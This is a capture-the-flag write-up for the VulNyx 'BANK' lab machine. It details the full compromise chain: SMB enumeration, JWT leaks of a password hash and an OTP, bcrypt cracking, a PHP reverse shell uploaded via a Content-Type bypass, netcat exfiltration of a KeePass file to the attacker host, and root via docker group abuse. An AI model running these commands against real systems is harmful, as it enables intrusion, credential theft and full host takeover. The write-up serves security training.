Bank
VulNyx β BANK Writeup
π― Target Information
- Platform: VulNyx.com
- Machine Name: BANK
- Key Vulnerabilities:
- SMB Anonymous Share Access
- Information Disclosure
- JWT Information Leakage
- Weak Administrative Credentials
- File Upload Bypass
- Remote Code Execution (RCE)
- KeePass Credential Exposure
- Docker Group Privilege Escalation
π Network Discovery
First, scan the local network to identify active hosts using arp-scan.
sudo arp-scan --localnet
Result
$ sudo arp-scan --localnet
[sudo] password for arc:
Sorry, try again.
[sudo] password for arc:
Sorry, try again.
[sudo] password for arc:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:8d:a8:e2, IPv4: 172.29.112.76
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
172.29.112.109 fe:f7:e9:58:e3:54 (Unknown: locally administered)
172.29.112.122 62:70:c1:a1:26:26 (Unknown: locally administered)
172.29.112.170 00:0c:29:09:d5:97 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.098 seconds (122.02 hosts/sec). 3 responded
The target machine IP address was identified as:
172.29.112.170
π Enumeration
Nmap Scan
Perform a full TCP port scan:
nmap -n -Pn -sS -p- --min-rate 5000 172.29.112.170
Scan Results
$ nmap -n -Pn -sS -p- --min-rate 5000 172.29.112.170
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-29 02:00 -0700
Nmap scan report for 172.29.112.170
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:09:D5:97 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.29 seconds
Findings
- Port 80 β HTTP
- Port 139 β NetBIOS
- Port 445 β SMB
The SMB service appeared particularly interesting and was selected for further enumeration.
π Web Enumeration
Opening the website redirected the browser to:
http://bank.nyx
Since the domain could not be resolved, add it to the /etc/hosts file:
172.29.112.170 bank.nyx
After refreshing the page, the Bank Alpha website loaded successfully.
Observation
A notice on the homepage stated:
π Coming Soon: Bank Alpha Public Launch Q3 2026
This suggested that the application was still under development and might contain security misconfigurations.
π Directory Enumeration
Use Gobuster to search for hidden directories:
gobuster dir -u http://bank.nyx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Result
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bank.nyx
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
server-status (Status: 403) [Size: 313]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================
No additional directories were discovered.
π SMB Enumeration
Enumerate SMB shares anonymously:
smbclient -L //172.29.112.170/ -N
Result
$ smbclient -L //172.29.112.170/ -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
development Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.22.8-Debian-4.22.8+dfsg-0+deb13u1)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.29.112.170 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
Important Finding
An anonymous SMB share named:
development
was accessible.
π₯ Accessing the SMB Share
Connect to the share:
smbclient //172.29.112.170/development -N
Download the file:
mget *
List files:
$ smbclient //172.29.112.170/development -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 3 03:43:20 2026
.. D 0 Sun May 3 03:43:20 2026
03-may-26.txt N 1141 Sun May 3 03:43:20 2026
9627844 blocks of size 1024. 6209724 blocks available
smb: \> mget *
Get file 03-may-26.txt? y
getting file \03-may-26.txt of size 1141 as 03-may-26.txt (31.0 KiloBytes/sec) (average 31.0 KiloBytes/sec)
smb: \>
Download the file:
mget *
π Information Disclosure
Reading the contents of 03-may-26.txt revealed:
Subject: AI Agent Integration & Development Environment Setup
To streamline and accelerate the development of the banking platform, we have decided to integrate a subscription-based AI agent into our workflow.
The service has proven to be cost-effective; however, please be aware that the AI may occasionally produce incorrect or unexpected outputs.
For this reason, it is important to maintain strict attention to security and validate all critical operations.
A dedicated development directory has been enabled where developers can access and test the application.
Dir: development-0119-d5e051a-9da2-12sdas1-775-e0174
Additionally, the system administrator user called Juan, hired by Lucas in recent days, is currently on a probationary training period within the company.
He will be responsible for completing the configuration of the SMB service. While the service is already installed, some final setup steps are
still pending. Please note that he is still gaining experience, so we kindly ask for patience and encourage collaboration and assistance if needed
to ensure everything is properly configured.
Best regards,
Marcelo
Important Finding
A development directory was disclosed:
development-0119-d5e051a-9da2-12sdas1-775-e0174
Navigate to:
http://bank.nyx/development-0119-d5e051a-9da2-12sdas1-775-e0174
A login and registration portal was discovered.
π Account Registration
Register a new account and Login to the application.
| Register | Login |
|---|---|
After logging in, navigate through the Summary section and identify the account verification feature.
Testing the username:
admin
confirmed that the administrator account exists.
π JWT Analysis
Capture the verification Response using Burp Suite.
Inspect the JWT token using the JWT-Editor extension.
Important Finding
The JWT token contained:
- Username : admin
- Password hash :
$2y$12$X4uppQvzwFCSbVfCH7qF1eNOSA6/cBy/o5sbVcxxdfu/GF7.a0YKi
for the administrator account.
π Password Cracking
Extract the bcrypt hash and crack it using John the Ripper:
john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Result
$ john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182 (?)
1g 0:00:00:05 DONE (2026-05-30 01:50) 0.1901g/s 41.06p/s 41.06c/s 41.06C/s peanut..jessie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Administrator Credentials
Username: admin
Password: blink182
π OTP Disclosure
Login as the administrator using the Credentials .
The application requested a One-Time Password (OTP).
Capture the request using Burp Suite and inspect the JWT token.
Important Finding
The JWT payload contained:
otp = 540294
Enter the OTP and successfully authenticate as the administrator.
π€ File Upload Bypass
The administrator panel contained a profile update feature that allowed file uploads.
Only JPG, JPEG, and PNG files are allowed.
Get the PHP reverse shell from the https://www.revshells.com/ of “PHP PentestMonkey” and save to a file. Upload the PHP reverse shell.
Capture the upload request in Burp Suite.
Original header:
Content-Type: application/x-php
Modify it to:
Content-Type: image/png
Forward the request.
Although the application returned a 500 Internal Server Error.
π Uploaded File Discovery
Inspect subsequent requests and identify the uploads directory:
/development-0119-d5e051a-9da2-12sdas1-775-e0174/uploads/
Navigate to the directory.
The PHP reverse shell file was uploaded successfully.
π§ Netcat Listener
Start a listener on the attacker machine:
nc -lvnp 443
π Remote Code Execution
Trigger the uploaded PHP reverse shell.
Result
$ nc -lnvp 443
listening on [any] 443 ...
connect to [172.29.112.76] from (UNKNOWN) [172.29.112.170] 57018
Linux bank 6.12.85+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.85-1 (2026-04-30) x86_64 GNU/Linux
Successfully obtained a reverse shell as:
π§ Upgrading the Shell
Spawn a Bash shell:
script /dev/null -c bash
Press:
Ctrl + Z
Configure the terminal:
stty raw -echo; fg
reset xterm
export TERM=xterm
export BASH=bash
The shell is now fully interactive.
π Sensitive Files Discovery
While enumerating directories, the following files were discovered:
www-data@bank:/srv/smb/passwords$ ls
note.txt passwords.kdbx
Read the note.txt:
cat note.txt
Result
Hey, as you said Marcelo, Iβve already left a KeePass file with all the system passwords you asked me to create, except for the root password.
The KeePass password is: `@zm{2h8aUu'a_M;'Jd:!MAQ?zn
Delete it after reading, but donβt worryβI think Iβve configured this directory properly so only you can access
it, and itβs not exposed on the SMB service either.
β Juan
Important Finding
The KeePass master password was disclosed.
π₯ Retrieving the KeePass Database
Transfer the database to the attacker machine.
On Target
nc 172.29.112.76 4444 < passwords.kdbx
On Attacker
nc -lvnp 4444 > passwords.kdbx
Open the database using KeePassXC. To Install
sudo apt install keepassxc
To Open
keepassxc passwords.kdbx
Enter the password:
`@zm{2h8aUu'a_M;'Jd:!MAQ?zn
Important Finding
Credentials for the user marcelo were stored in the database.
Username: marcelo
Password: m4rC1!#asl2#vsHj4!
π₯ User Access
Switch to the Marcelo account:
su - marcelo
Enter the password.
Verify access:
hostname ; id
Result
marcelo@bank:/srv/smb/passwords$ hostname ;id
bank
uid=1000(marcelo) gid=1000(marcelo) groups=1000(marcelo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),105(docker)
Important Finding
The user belongs to the:
docker
group.
π User Flag
cat /home/marcelo/user.txt
52728f2b72b6a153a415d8***********
π Privilege Escalation via Docker
Enumerate available Docker images:
docker images
Result
marcelo@bank:/srv/smb/passwords$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
debian bookworm-slim 865980b94764 5 weeks ago 74.8MB
Since the user belongs to the Docker group, a container can be used to mount the host filesystem and obtain root access.
Execute:
docker run -v /:/host -it --rm debian:bookworm-slim chroot /host bash
π Root Access
Verify privileges:
marcelo@bank:/srv/smb/passwords$ docker run -v /:/host -it --rm debian:bookworm-slim chroot /host bash
root@d9a79b7c88f0:/# id ;
uid=0(root) gid=0(root) groups=0(root)
root@d9a79b7c88f0:/#
Successfully escalated privileges to root.
π Root Flag
root@d9a79b7c88f0:/# find / -type f -name root.txt 2>/dev/null
/root/root.txt
root@d9a79b7c88f0:/# cat /root/root.txt
e8bd8213ff4f6b805dec90**********
root@d9a79b7c88f0:/#
π§Ύ Summary
| Phase | Technique |
|---|---|
| Network Discovery | arp-scan |
| Enumeration | Nmap |
| SMB Enumeration | Anonymous Share Access |
| Information Disclosure | Development Notes |
| Web Exploitation | JWT Analysis |
| Credential Recovery | Hash Cracking |
| Authentication Bypass | OTP Disclosure |
| Remote Code Execution | File Upload Bypass |
| Credential Harvesting | KeePass Database |
| Privilege Escalation | Docker Group Abuse |
| Root Access | Host Filesystem Mount |
π Key Takeaways
- Anonymous SMB shares can expose sensitive development information.
- JWT tokens should never contain passwords or password hashes.
- Client-side file validation is not sufficient for upload security.
- Sensitive password databases should never be stored alongside plaintext credentials.
- Membership in the Docker group effectively grants root-level access to the host.
